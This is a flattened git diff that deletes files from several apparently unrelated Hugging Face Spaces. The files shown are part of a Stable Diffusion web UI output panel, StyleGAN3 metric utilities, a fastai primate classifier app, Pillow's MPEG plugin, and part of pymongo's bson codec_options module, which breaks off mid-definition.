filenames.append(filename) - fullfns.append(fullfn) - if txt_fullfn: - filenames.append(os.path.basename(txt_fullfn)) - fullfns.append(txt_fullfn) - - writer.writerow([data["prompt"], data["seed"], data["width"], data["height"], data["sampler_name"], data["cfg_scale"], data["steps"], filenames[0], data["negative_prompt"]]) - - # Make Zip - if do_make_zip: - zip_filepath = os.path.join(path, "images.zip") - - from zipfile import ZipFile - with ZipFile(zip_filepath, "w") as zip_file: - for i in range(len(fullfns)): - with open(fullfns[i], mode="rb") as f: - zip_file.writestr(filenames[i], f.read()) - fullfns.insert(0, zip_filepath) - - return gr.File.update(value=fullfns, visible=True), plaintext_to_html(f"Saved: {filenames[0]}") - - -def create_output_panel(tabname, outdir): - from modules import shared - import modules.generation_parameters_copypaste as parameters_copypaste - - def open_folder(f): - if not os.path.exists(f): - print(f'Folder "{f}" does not exist. After you create an image, the folder will be created.') - return - elif not os.path.isdir(f): - print(f""" -WARNING -An open_folder request was made with an argument that is not a folder. -This could be an error or a malicious attempt to run code on your computer. -Requested path was: {f} -""", file=sys.stderr) - return - - if not shared.cmd_opts.hide_ui_dir_config: - path = os.path.normpath(f) - if platform.system() == "Windows": - os.startfile(path) - elif platform.system() == "Darwin": - sp.Popen(["open", path]) - elif "microsoft-standard-WSL2" in platform.uname().release: - sp.Popen(["wsl-open", path]) - else: - sp.Popen(["xdg-open", path]) - - with gr.Column(variant='panel', elem_id=f"{tabname}_results"): - with gr.Group(elem_id=f"{tabname}_gallery_container"): - result_gallery = gr.Gallery(label='Output', show_label=False, elem_id=f"{tabname}_gallery").style(grid=4) - - generation_info = None - with gr.Column(): - with gr.Row(elem_id=f"image_buttons_{tabname}"): - open_folder_button = gr.Button(folder_symbol, elem_id="hidden_element" if shared.cmd_opts.hide_ui_dir_config else f'open_folder_{tabname}') - - if tabname != "extras": - save = gr.Button('Save', elem_id=f'save_{tabname}') - save_zip = gr.Button('Zip', elem_id=f'save_zip_{tabname}') - - buttons = parameters_copypaste.create_buttons(["img2img", "inpaint", "extras"]) - - open_folder_button.click( - fn=lambda: open_folder(shared.opts.outdir_samples or outdir), - inputs=[], - outputs=[], - ) - - if tabname != "extras": - with gr.Row(): - download_files = gr.File(None, file_count="multiple", interactive=False, show_label=False, visible=False, elem_id=f'download_files_{tabname}') - - with gr.Group(): - html_info = gr.HTML(elem_id=f'html_info_{tabname}') - html_log = gr.HTML(elem_id=f'html_log_{tabname}') - - generation_info = gr.Textbox(visible=False, elem_id=f'generation_info_{tabname}') - if tabname == 'txt2img' or tabname == 'img2img': - generation_info_button = gr.Button(visible=False, elem_id=f"{tabname}_generation_info_button") - generation_info_button.click( - fn=update_generation_info, - _js="function(x, y, z){ return [x, y, selected_gallery_index()] }", - inputs=[generation_info, html_info, html_info], - outputs=[html_info, html_info], - ) - - save.click( - fn=call_queue.wrap_gradio_call(save_files), - _js="(x, y, z, w) => [x, y, false, selected_gallery_index()]", - inputs=[ - generation_info, - result_gallery, - html_info, - html_info, - ], - outputs=[ - download_files, - html_log, - ], - show_progress=False, - ) - - save_zip.click( - fn=call_queue.wrap_gradio_call(save_files), - _js="(x, y, z, w) => [x, y, true, selected_gallery_index()]", - inputs=[ - generation_info, - result_gallery, - html_info, - html_info, - ], - outputs=[ - download_files, - html_log, - ] - ) - - else: - html_info_x = gr.HTML(elem_id=f'html_info_x_{tabname}') - html_info = gr.HTML(elem_id=f'html_info_{tabname}') - html_log = gr.HTML(elem_id=f'html_log_{tabname}') - - for paste_tabname, paste_button in buttons.items(): - parameters_copypaste.register_paste_params_button(parameters_copypaste.ParamBinding( - paste_button=paste_button, tabname=paste_tabname, source_tabname="txt2img" if tabname == "txt2img" else None, source_image_component=result_gallery - )) - - return result_gallery, generation_info if tabname != "extras" else html_info_x, html_info, html_log diff --git a/spaces/james-oldfield/PandA/networks/stylegan3/metrics/metric_utils.py b/spaces/james-oldfield/PandA/networks/stylegan3/metrics/metric_utils.py deleted file mode 100644 index af122b21b5a7874d63b79ee40c2cb36d4ab4e5a2..0000000000000000000000000000000000000000 --- a/spaces/james-oldfield/PandA/networks/stylegan3/metrics/metric_utils.py +++ /dev/null @@ -1,279 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Miscellaneous utilities used internally by the quality metrics.""" - -import os -import time -import hashlib -import pickle -import copy -import uuid -import numpy as np -import torch -import dnnlib - -#---------------------------------------------------------------------------- - -class MetricOptions: - def __init__(self, G=None, G_kwargs={}, dataset_kwargs={}, num_gpus=1, rank=0, device=None, progress=None, cache=True): - assert 0 <= rank < num_gpus - self.G = G - self.G_kwargs = dnnlib.EasyDict(G_kwargs) - self.dataset_kwargs = dnnlib.EasyDict(dataset_kwargs) - self.num_gpus = num_gpus - self.rank = rank - self.device = device if device is not None else torch.device('cuda', rank) - self.progress = progress.sub() if progress is not None and rank == 0 else ProgressMonitor() - self.cache = cache - -#---------------------------------------------------------------------------- - -_feature_detector_cache = dict() - -def get_feature_detector_name(url): - return os.path.splitext(url.split('/')[-1])[0] - -def get_feature_detector(url, device=torch.device('cpu'), num_gpus=1, rank=0, verbose=False): - assert 0 <= rank < num_gpus - key = (url, device) - if key not in _feature_detector_cache: - is_leader = (rank == 0) - if not is_leader and num_gpus > 1: - torch.distributed.barrier() # leader goes first - with dnnlib.util.open_url(url, verbose=(verbose and is_leader)) as f: - _feature_detector_cache[key] = pickle.load(f).to(device) - if is_leader and num_gpus > 1: - torch.distributed.barrier() # others follow - return _feature_detector_cache[key] - -#---------------------------------------------------------------------------- - -def iterate_random_labels(opts, batch_size): - if opts.G.c_dim == 0: - c = torch.zeros([batch_size, opts.G.c_dim], device=opts.device) - while True: - yield c - else: - dataset = dnnlib.util.construct_class_by_name(**opts.dataset_kwargs) - while True: - c = [dataset.get_label(np.random.randint(len(dataset))) for _i in range(batch_size)] - c = torch.from_numpy(np.stack(c)).pin_memory().to(opts.device) - yield c - -#---------------------------------------------------------------------------- - -class FeatureStats: - def __init__(self, capture_all=False, capture_mean_cov=False, max_items=None): - self.capture_all = capture_all - self.capture_mean_cov = capture_mean_cov - self.max_items = max_items - self.num_items = 0 - self.num_features = None - self.all_features = None - self.raw_mean = None - self.raw_cov = None - - def set_num_features(self, num_features): - if self.num_features is not None: - assert num_features == self.num_features - else: - self.num_features = num_features - self.all_features = [] - self.raw_mean = np.zeros([num_features], dtype=np.float64) - self.raw_cov = np.zeros([num_features, num_features], dtype=np.float64) - - def is_full(self): - return (self.max_items is not None) and (self.num_items >= self.max_items) - - def append(self, x): - x = np.asarray(x, dtype=np.float32) - assert x.ndim == 2 - if (self.max_items is not None) and (self.num_items + x.shape[0] > self.max_items): - if self.num_items >= self.max_items: - return - x = x[:self.max_items - self.num_items] - - self.set_num_features(x.shape[1]) - self.num_items += x.shape[0] - if self.capture_all: - self.all_features.append(x) - if self.capture_mean_cov: - x64 = x.astype(np.float64) - self.raw_mean += x64.sum(axis=0) - self.raw_cov += x64.T @ x64 - - def append_torch(self, x, num_gpus=1, rank=0): - assert isinstance(x, torch.Tensor) and x.ndim == 2 - assert 0 <= rank < num_gpus - if num_gpus > 1: - ys = [] - for src in range(num_gpus): - y = x.clone() - torch.distributed.broadcast(y, src=src) - ys.append(y) - x = torch.stack(ys, dim=1).flatten(0, 1) # interleave samples - self.append(x.cpu().numpy()) - - def get_all(self): - assert self.capture_all - return np.concatenate(self.all_features, axis=0) - - def get_all_torch(self): - return torch.from_numpy(self.get_all()) - - def get_mean_cov(self): - assert self.capture_mean_cov - mean = self.raw_mean / self.num_items - cov = self.raw_cov / self.num_items - cov = cov - np.outer(mean, mean) - return mean, cov - - def save(self, pkl_file): - with open(pkl_file, 'wb') as f: - pickle.dump(self.__dict__, f) - - @staticmethod - def load(pkl_file): - with open(pkl_file, 'rb') as f: - s = dnnlib.EasyDict(pickle.load(f)) - obj = FeatureStats(capture_all=s.capture_all, max_items=s.max_items) - obj.__dict__.update(s) - return obj - -#---------------------------------------------------------------------------- - -class ProgressMonitor: - def __init__(self, tag=None, num_items=None, flush_interval=1000, verbose=False, progress_fn=None, pfn_lo=0, pfn_hi=1000, pfn_total=1000): - self.tag = tag - self.num_items = num_items - self.verbose = verbose - self.flush_interval = flush_interval - self.progress_fn = progress_fn - self.pfn_lo = pfn_lo - self.pfn_hi = pfn_hi - self.pfn_total = pfn_total - self.start_time = time.time() - self.batch_time = self.start_time - self.batch_items = 0 - if self.progress_fn is not None: - self.progress_fn(self.pfn_lo, self.pfn_total) - - def update(self, cur_items): - assert (self.num_items is None) or (cur_items <= self.num_items) - if (cur_items < self.batch_items + self.flush_interval) and (self.num_items is None or cur_items < self.num_items): - return - cur_time = time.time() - total_time = cur_time - self.start_time - time_per_item = (cur_time - self.batch_time) / max(cur_items - self.batch_items, 1) - if (self.verbose) and (self.tag is not None): - print(f'{self.tag:<19s} items {cur_items:<7d} time {dnnlib.util.format_time(total_time):<12s} ms/item {time_per_item*1e3:.2f}') - self.batch_time = cur_time - self.batch_items = cur_items - - if (self.progress_fn is not None) and (self.num_items is not None): - self.progress_fn(self.pfn_lo + (self.pfn_hi - self.pfn_lo) * (cur_items / self.num_items), self.pfn_total) - - def sub(self, tag=None, num_items=None, flush_interval=1000, rel_lo=0, rel_hi=1): - return ProgressMonitor( - tag = tag, - num_items = num_items, - flush_interval = flush_interval, - verbose = self.verbose, - progress_fn = self.progress_fn, - pfn_lo = self.pfn_lo + (self.pfn_hi - self.pfn_lo) * rel_lo, - pfn_hi = self.pfn_lo + (self.pfn_hi - self.pfn_lo) * rel_hi, - pfn_total = self.pfn_total, - ) - -#---------------------------------------------------------------------------- - -def compute_feature_stats_for_dataset(opts, detector_url, detector_kwargs, rel_lo=0, rel_hi=1, batch_size=64, data_loader_kwargs=None, max_items=None, **stats_kwargs): - dataset = dnnlib.util.construct_class_by_name(**opts.dataset_kwargs) - if data_loader_kwargs is None: - data_loader_kwargs = dict(pin_memory=True, num_workers=3, prefetch_factor=2) - - # Try to lookup from cache. - cache_file = None - if opts.cache: - # Choose cache file name. - args = dict(dataset_kwargs=opts.dataset_kwargs, detector_url=detector_url, detector_kwargs=detector_kwargs, stats_kwargs=stats_kwargs) - md5 = hashlib.md5(repr(sorted(args.items())).encode('utf-8')) - cache_tag = f'{dataset.name}-{get_feature_detector_name(detector_url)}-{md5.hexdigest()}' - cache_file = dnnlib.make_cache_dir_path('gan-metrics', cache_tag + '.pkl') - - # Check if the file exists (all processes must agree). - flag = os.path.isfile(cache_file) if opts.rank == 0 else False - if opts.num_gpus > 1: - flag = torch.as_tensor(flag, dtype=torch.float32, device=opts.device) - torch.distributed.broadcast(tensor=flag, src=0) - flag = (float(flag.cpu()) != 0) - - # Load. - if flag: - return FeatureStats.load(cache_file) - - # Initialize. - num_items = len(dataset) - if max_items is not None: - num_items = min(num_items, max_items) - stats = FeatureStats(max_items=num_items, **stats_kwargs) - progress = opts.progress.sub(tag='dataset features', num_items=num_items, rel_lo=rel_lo, rel_hi=rel_hi) - detector = get_feature_detector(url=detector_url, device=opts.device, num_gpus=opts.num_gpus, rank=opts.rank, verbose=progress.verbose) - - # Main loop. - item_subset = [(i * opts.num_gpus + opts.rank) % num_items for i in range((num_items - 1) // opts.num_gpus + 1)] - for images, _labels in torch.utils.data.DataLoader(dataset=dataset, sampler=item_subset, batch_size=batch_size, **data_loader_kwargs): - if images.shape[1] == 1: - images = images.repeat([1, 3, 1, 1]) - features = detector(images.to(opts.device), **detector_kwargs) - stats.append_torch(features, num_gpus=opts.num_gpus, rank=opts.rank) - progress.update(stats.num_items) - - # Save to cache. - if cache_file is not None and opts.rank == 0: - os.makedirs(os.path.dirname(cache_file), exist_ok=True) - temp_file = cache_file + '.' + uuid.uuid4().hex - stats.save(temp_file) - os.replace(temp_file, cache_file) # atomic - return stats - -#---------------------------------------------------------------------------- - -def compute_feature_stats_for_generator(opts, detector_url, detector_kwargs, rel_lo=0, rel_hi=1, batch_size=64, batch_gen=None, **stats_kwargs): - if batch_gen is None: - batch_gen = min(batch_size, 4) - assert batch_size % batch_gen == 0 - - # Setup generator and labels. - G = copy.deepcopy(opts.G).eval().requires_grad_(False).to(opts.device) - c_iter = iterate_random_labels(opts=opts, batch_size=batch_gen) - - # Initialize. - stats = FeatureStats(**stats_kwargs) - assert stats.max_items is not None - progress = opts.progress.sub(tag='generator features', num_items=stats.max_items, rel_lo=rel_lo, rel_hi=rel_hi) - detector = get_feature_detector(url=detector_url, device=opts.device, num_gpus=opts.num_gpus, rank=opts.rank, verbose=progress.verbose) - - # Main loop. - while not stats.is_full(): - images = [] - for _i in range(batch_size // batch_gen): - z = torch.randn([batch_gen, G.z_dim], device=opts.device) - img = G(z=z, c=next(c_iter), **opts.G_kwargs) - img = (img * 127.5 + 128).clamp(0, 255).to(torch.uint8) - images.append(img) - images = torch.cat(images) - if images.shape[1] == 1: - images = images.repeat([1, 3, 1, 1]) - features = detector(images, **detector_kwargs) - stats.append_torch(features, num_gpus=opts.num_gpus, rank=opts.rank) - progress.update(stats.num_items) - return stats - -#---------------------------------------------------------------------------- diff --git a/spaces/jasonreisman/primates/app.py b/spaces/jasonreisman/primates/app.py deleted file mode 100644 index 30cc6fe359dbf0f6052f8e830ed11ffeae891b52..0000000000000000000000000000000000000000 --- a/spaces/jasonreisman/primates/app.py +++ /dev/null @@ -1,20 +0,0 @@ -import gradio as gr -from fastai.vision.all import * -import skimage - -learn = load_learner('chimpanzee-gorilla-human-mandrill-orangutan.pkl') - -labels = learn.dls.vocab -def predict(img): - img = PILImage.create(img) - pred, pred_idx, probs = learn.predict(img) - return {labels[i]: float(probs[i]) for i in range(len(labels))} - -title = "Primate Palooza" -description = "Classify chimps, gorillas, humans, mandrills, and orangutan" -examples = ['chimpanzee.jpg', 'gorilla.jpg', 'human.jpg', 'mandrill.jpg', 'orangutan.jpg'] -interpretation='default' -enable_queue=True - -grint = gr.Interface(fn=predict, inputs=gr.Image(shape=(512, 512)), outputs=gr.Label(num_top_classes=5), title=title, description=description, examples=examples, interpretation=interpretation, enable_queue=enable_queue) -grint.launch() diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/PIL/MpegImagePlugin.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/PIL/MpegImagePlugin.py deleted file mode 100644 index d96d3a11c4966e94a53c67f13c3bf8f7987c0c83..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/PIL/MpegImagePlugin.py +++ /dev/null @@ -1,82 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# MPEG file handling -# -# History: -# 95-09-09 fl Created -# -# Copyright (c) Secret Labs AB 1997. -# Copyright (c) Fredrik Lundh 1995. -# -# See the README file for information on usage and redistribution. -# - - -from . import Image, ImageFile -from ._binary import i8 - -# -# Bitstream parser - - -class BitStream: - def __init__(self, fp): - self.fp = fp - self.bits = 0 - self.bitbuffer = 0 - - def next(self): - return i8(self.fp.read(1)) - - def peek(self, bits): - while self.bits < bits: - c = self.next() - if c < 0: - self.bits = 0 - continue - self.bitbuffer = (self.bitbuffer << 8) + c - self.bits += 8 - return self.bitbuffer >> (self.bits - bits) & (1 << bits) - 1 - - def skip(self, bits): - while self.bits < bits: - self.bitbuffer = (self.bitbuffer << 8) + i8(self.fp.read(1)) - self.bits += 8 - self.bits = self.bits - bits - - def read(self, bits): - v = self.peek(bits) - self.bits = self.bits - bits - return v - - -## -# Image plugin for MPEG streams. This plugin can identify a stream, -# but it cannot read it. - - -class MpegImageFile(ImageFile.ImageFile): - format = "MPEG" - format_description = "MPEG" - - def _open(self): - s = BitStream(self.fp) - - if s.read(32) != 0x1B3: - msg = "not an MPEG file" - raise SyntaxError(msg) - - self.mode = "RGB" - self._size = s.read(12), s.read(12) - - -# -------------------------------------------------------------------- -# Registry stuff - -Image.register_open(MpegImageFile.format, MpegImageFile) - -Image.register_extensions(MpegImageFile.format, [".mpg", ".mpeg"]) - -Image.register_mime(MpegImageFile.format, "video/mpeg") diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/bson/codec_options.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/bson/codec_options.py deleted file mode 100644 index 9c511b5d6fcd80941ff18c207ec5e400e48febd9..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/bson/codec_options.py +++ /dev/null @@ -1,507 +0,0 @@ -# Copyright 2014-present MongoDB, Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""Tools for specifying BSON codec options.""" - -import abc -import datetime -import enum -from collections.abc import MutableMapping as _MutableMapping -from typing import ( - TYPE_CHECKING, - Any, - Callable, - Dict, - Generic, - Iterable, - Mapping, - NamedTuple, - Optional, - Tuple, - Type, - Union, - cast, -) - -from bson.binary import ( - ALL_UUID_REPRESENTATIONS, - UUID_REPRESENTATION_NAMES, - UuidRepresentation, -) -from bson.typings import _DocumentType - -_RAW_BSON_DOCUMENT_MARKER = 101 - - -def _raw_document_class(document_class: Any) -> bool: - """Determine if a document_class is a RawBSONDocument class.""" - marker = getattr(document_class, "_type_marker", None) - return marker == _RAW_BSON_DOCUMENT_MARKER - - -class TypeEncoder(abc.ABC): - """Base class for defining type codec classes which describe how a - custom type can be transformed to one of the types BSON understands. - - Codec classes must implement the ``python_type`` attribute, and the - ``transform_python`` method to support encoding. - - See :ref:`custom-type-type-codec` documentation for an example. - """ - - @abc.abstractproperty - def python_type(self) -> Any: - """The Python type to be converted into something serializable.""" - - @abc.abstractmethod - def transform_python(self, value: Any) -> Any: - """Convert the given Python object into something serializable.""" - - -class TypeDecoder(abc.ABC): - """Base class for defining type codec classes which describe how a - BSON type can be transformed to a custom type. - - Codec classes must implement the ``bson_type`` attribute, and the - ``transform_bson`` method to support decoding. - - See :ref:`custom-type-type-codec` documentation for an example. - """ - - @abc.abstractproperty - def bson_type(self) -> Any: - """The BSON type to be converted into our own type.""" - - @abc.abstractmethod - def transform_bson(self, value: Any) -> Any: - """Convert the given BSON value into our own type.""" - - -class TypeCodec(TypeEncoder, TypeDecoder): - """Base class for defining type codec classes which describe how a - custom type can be transformed to/from one of the types :mod:`bson` - can already encode/decode. - - Codec classes must implement the ``python_type`` attribute, and the - ``transform_python`` method to support encoding, as well as the - ``bson_type`` attribute, and the ``transform_bson`` method to support - decoding. - - See :ref:`custom-type-type-codec` documentation for an example. - """ - - -_Codec = Union[TypeEncoder, TypeDecoder, TypeCodec] -_Fallback = Callable[[Any], Any] - - -class TypeRegistry: - """Encapsulates type codecs used in encoding and / or decoding BSON, as - well as the fallback encoder. Type registries cannot be modified after - instantiation. - - ``TypeRegistry`` can be initialized with an iterable of type codecs, and - a callable for the fallback encoder:: - - >>> from bson.codec_options import TypeRegistry - >>> type_registry = TypeRegistry([Codec1, Codec2, Codec3, ...], - ... fallback_encoder) - - See :ref:`custom-type-type-registry` documentation for an example. - - :Parameters: - - `type_codecs` (optional): iterable of type codec instances. If - ``type_codecs`` contains multiple codecs that transform a single - python or BSON type, the transformation specified by the type codec - occurring last prevails. A TypeError will be raised if one or more - type codecs modify the encoding behavior of a built-in :mod:`bson` - type. - - `fallback_encoder` (optional): callable that accepts a single, - unencodable python value and transforms it into a type that - :mod:`bson` can encode. See :ref:`fallback-encoder-callable` - documentation for an example. - """ - - def __init__( - self, - type_codecs: Optional[Iterable[_Codec]] = None, - fallback_encoder: Optional[_Fallback] = None, - ) -> None: - self.__type_codecs = list(type_codecs or []) - self._fallback_encoder = fallback_encoder - self._encoder_map: Dict[Any, Any] = {} - self._decoder_map: Dict[Any, Any] = {} - - if self._fallback_encoder is not None: - if not callable(fallback_encoder): - raise TypeError("fallback_encoder %r is not a callable" % (fallback_encoder)) - - for codec in self.__type_codecs: - is_valid_codec = False - if isinstance(codec, TypeEncoder): - self._validate_type_encoder(codec) - is_valid_codec = True - self._encoder_map[codec.python_type] = codec.transform_python - if isinstance(codec, TypeDecoder): - is_valid_codec = True - self._decoder_map[codec.bson_type] = codec.transform_bson - if not is_valid_codec: - raise TypeError( - f"Expected an instance of {TypeEncoder.__name__}, {TypeDecoder.__name__}, or {TypeCodec.__name__}, got {codec!r} instead" - ) - - def _validate_type_encoder(self, codec: _Codec) -> None: - from bson import _BUILT_IN_TYPES - - for pytype in _BUILT_IN_TYPES: - if issubclass(cast(TypeCodec, codec).python_type, pytype): - err_msg = ( - "TypeEncoders cannot change how built-in types are " - "encoded (encoder {} transforms type {})".format(codec, pytype) - ) - raise TypeError(err_msg) - - def __repr__(self) -> str: - return "{}(type_codecs={!r}, fallback_encoder={!r})".format( - self.__class__.__name__, - self.__type_codecs, - self._fallback_encoder, - ) - - def __eq__(self, other: Any) -> Any: - if not isinstance(other, type(self)): - return NotImplemented - return ( - (self._decoder_map == other._decoder_map) - and (self._encoder_map == other._encoder_map) - and (self._fallback_encoder == other._fallback_encoder) - ) - - -class DatetimeConversion(int, enum.Enum): - """Options for decoding BSON datetimes.""" - - DATETIME = 1 - """Decode a BSON UTC datetime as a :class:`datetime.datetime`. - - BSON UTC datetimes that cannot be represented as a - :class:`~datetime.datetime` will raise an :class:`OverflowError` - or a :class:`ValueError`. - - .. versionadded 4.3 - """ - - DATETIME_CLAMP = 2 - """Decode a BSON UTC datetime as a :class:`datetime.datetime`, clamping - to :attr:`~datetime.datetime.min` and :attr:`~datetime.datetime.max`. - - .. versionadded 4.3 - """ - - DATETIME_MS = 3 - """Decode a BSON UTC datetime as a :class:`~bson.datetime_ms.DatetimeMS` - object. - - .. versionadded 4.3 - """ - - DATETIME_AUTO = 4 - """Decode a BSON UTC datetime as a :class:`datetime.datetime` if possible, - and a :class:`~bson.datetime_ms.DatetimeMS` if not. - - .. versionadded 4.3 - """ - - -class _BaseCodecOptions(NamedTuple): - document_class: Type[Mapping[str, Any]] - tz_aware: bool - uuid_representation: int - unicode_decode_error_handler: str - tzinfo: Optional[datetime.tzinfo] - type_registry: TypeRegistry - datetime_conversion: Optional[DatetimeConversion] - - -if TYPE_CHECKING: - - class CodecOptions(Tuple, Generic[_DocumentType]): - document_class: Type[_DocumentType] - tz_aware: bool - uuid_representation: int - unicode_decode_error_handler: Optional[str] - tzinfo: Optional[datetime.tzinfo] - type_registry: TypeRegistry - datetime_conversion: Optional[int] - - def __new__( - cls: Type["CodecOptions"], - document_class: Optional[Type[_DocumentType]] = ..., - tz_aware: bool = ..., - uuid_representation: Optional[int] = ..., - unicode_decode_error_handler: Optional[str] = ..., - tzinfo: Optional[datetime.tzinfo] = ..., - type_registry: Optional[TypeRegistry] = ..., - datetime_conversion: Optional[int] = ..., - ) -> "CodecOptions[_DocumentType]": - ... - - # CodecOptions API - def with_options(self, **kwargs: Any) -> "CodecOptions[_DocumentType]": - ... - - def _arguments_repr(self) -> str: - ... - - def _options_dict(self) -> Dict[Any, Any]: - ... - - # NamedTuple API - @classmethod - def _make(cls, obj: Iterable) -> "CodecOptions[_DocumentType]": - ... - - def _asdict(self) -> Dict[str, Any]: - ... - - def _replace(self, **kwargs: Any) -> "CodecOptions[_DocumentType]": - ... - - _source: str - _fields: Tuple[str] - -else: - - class CodecOptions(_BaseCodecOptions): - """Encapsulates options used encoding and / or decoding BSON.""" - - def __init__(self, *args, **kwargs): - """Encapsulates options used encoding and / or decoding BSON. - - The `document_class` option is used to define a custom type for use - decoding BSON documents. Access to the underlying raw BSON bytes for - a document is available using the :class:`~bson.raw_bson.RawBSONDocument` - type:: - - >>> from bson.raw_bson import RawBSONDocument - >>> from bson.codec_options import CodecOptions - >>> codec_options = CodecOptions(document_class=RawBSONDocument) - >>> coll = db.get_collection('test', codec_options=codec_options) - >>> doc = coll.find_one() - >>> doc.raw - '\\x16\\x00\\x00\\x00\\x07_id\\x00[0\\x165\\x91\\x10\\xea\\x14\\xe8\\xc5\\x8b\\x93\\x00' - - The document class can be any type that inherits from - :class:`~collections.abc.MutableMapping`:: - - >>> class AttributeDict(dict): - ... # A dict that supports attribute access. - ... def __getattr__(self, key): - ... return self[key] - ... def __setattr__(self, key, value): - ... self[key] = value - ... - >>> codec_options = CodecOptions(document_class=AttributeDict) - >>> coll = db.get_collection('test', codec_options=codec_options) - >>> doc = coll.find_one() - >>> doc._id - ObjectId('5b3016359110ea14e8c58b93') - - See :doc:`/examples/datetimes` for examples using the `tz_aware` and - `tzinfo` options. - - See :doc:`/examples/uuid` for examples using the `uuid_representation` - option. - - :Parameters: - - `document_class`: BSON documents returned in queries will be decoded - to an instance of this class. Must be a subclass of - :class:`~collections.abc.MutableMapping`. Defaults to :class:`dict`. - - `tz_aware`: If ``True``, BSON datetimes will be decoded to timezone - aware instances of :class:`~datetime.datetime`. Otherwise they will be - naive. Defaults to ``False``. - - `uuid_representation`: The BSON representation to use when encoding - and decoding instances of :class:`~uuid.UUID`. Defaults to - :data:`~bson.binary.UuidRepresentation.UNSPECIFIED`. New - applications should consider setting this to - :data:`~bson.binary.UuidRepresentation.STANDARD` for cross language - compatibility. See :ref:`handling-uuid-data-example` for details. - - `unicode_decode_error_handler`: The error handler to apply when - a Unicode-related error occurs during BSON decoding that would - otherwise raise :exc:`UnicodeDecodeError`. Valid options include - 'strict', 'replace', 'backslashreplace', 'surrogateescape', and - 'ignore'. Defaults to 'strict'. - - `tzinfo`: A :class:`~datetime.tzinfo` subclass that specifies the - timezone to/from which :class:`~datetime.datetime` objects should be - encoded/decoded. - - `type_registry`: Instance of :class:`TypeRegistry` used to customize - encoding and decoding behavior. - - `datetime_conversion`: Specifies how UTC datetimes should be decoded - within BSON. Valid options include 'datetime_ms' to return as a - DatetimeMS, 'datetime' to return as a datetime.datetime and - raising a ValueError for out-of-range values, 'datetime_auto' to - return DatetimeMS objects when the underlying datetime is - out-of-range and 'datetime_clamp' to clamp to the minimum and - maximum possible datetimes. Defaults to 'datetime'. - - .. versionchanged:: 4.0 - The default for `uuid_representation` was changed from - :const:`~bson.binary.UuidRepresentation.PYTHON_LEGACY` to - :const:`~bson.binary.UuidRepresentation.UNSPECIFIED`. - - .. versionadded:: 3.8 - `type_registry` attribute. - - .. warning:: Care must be taken when changing - `unicode_decode_error_handler` from its default value ('strict'). - The 'replace' and 'ignore' modes should not be used when documents - retrieved from the server will be modified in the client application - and stored back to the server. - """ - super().__init__() - - def __new__( - cls: Type["CodecOptions"], - document_class: Optional[Type[Mapping[str, Any]]] = None, - tz_aware: bool = False, - uuid_representation: Optional[int] = UuidRepresentation.UNSPECIFIED, - unicode_decode_error_handler: str = "strict", - tzinfo: Optional[datetime.tzinfo] = None, - type_registry: Optional[TypeRegistry] = None, - datetime_conversion: Optional[DatetimeConversion] = DatetimeConversion.DATETIME, - ) -> "CodecOptions": - doc_class = document_class or dict - # issubclass can raise TypeError for generic aliases like SON[str, Any]. - # In that case we can use the base class for the comparison. - is_mapping = False - try: - is_mapping = issubclass(doc_class, _MutableMapping) - except TypeError: - if hasattr(doc_class, "__origin__"): - is_mapping = issubclass(doc_class.__origin__, _MutableMapping) - if not (is_mapping or _raw_document_class(doc_class)): - raise TypeError( - "document_class must be dict, bson.son.SON, " - "bson.raw_bson.RawBSONDocument, or a " - "subclass of collections.abc.MutableMapping" - ) - if not isinstance(tz_aware, bool): - raise TypeError(f"tz_aware must be True or False, was: tz_aware={tz_aware}") - if uuid_representation not in ALL_UUID_REPRESENTATIONS: - raise ValueError( - "uuid_representation must be a value from bson.binary.UuidRepresentation" - ) - if not isinstance(unicode_decode_error_handler, str): - raise ValueError("unicode_decode_error_handler must be a string") - if tzinfo is not None: - if not isinstance(tzinfo, datetime.tzinfo): - raise TypeError("tzinfo must be an instance of datetime.tzinfo") - if not tz_aware: - raise ValueError("cannot specify tzinfo without also setting tz_aware=True") - - type_registry = type_registry or TypeRegistry() - - if not isinstance(type_registry, TypeRegistry): - raise TypeError("type_registry must be an instance of TypeRegistry") - - return tuple.__new__( - cls, - ( - doc_class, - tz_aware, - uuid_representation, - unicode_decode_error_handler, - tzinfo, - type_registry, - datetime_conversion, - ), - ) - - def _arguments_repr(self) -> str: - """Representation of the arguments used to create this object.""" - document_class_repr = ( - "dict" if self.document_class is dict else repr(self.document_class) - ) - - uuid_rep_repr = UUID_REPRESENTATION_NAMES.get( - self.uuid_representation, self.uuid_representation - ) - - return ( - "document_class={}, tz_aware={!r}, uuid_representation={}, " - "unicode_decode_error_handler={!r}, tzinfo={!r}, " - "type_registry={!r}, datetime_conversion={!s}".format( - document_class_repr, - self.tz_aware, - uuid_rep_repr, - self.unicode_decode_error_handler, - self.tzinfo, - self.type_registry, - self.datetime_conversion, - ) - ) - - def _options_dict(self) -> Dict[str, Any]: - """Dictionary of the arguments used to create this object.""" - # TODO: PYTHON-2442 use _asdict() instead - return { - "document_class": self.document_class, - "tz_aware": self.tz_aware, - "uuid_representation": self.uuid_representation, - "unicode_decode_error_handler": self.unicode_decode_error_handler, - "tzinfo": self.tzinfo, - "type_registry": self.type_registry, - "datetime_conversion": self.datetime_conversion, - } - - def __repr__(self) -> str: - return f"{self.__class__.__name__}({self._arguments_repr()})" - - def with_options(self, **kwargs: Any) -> 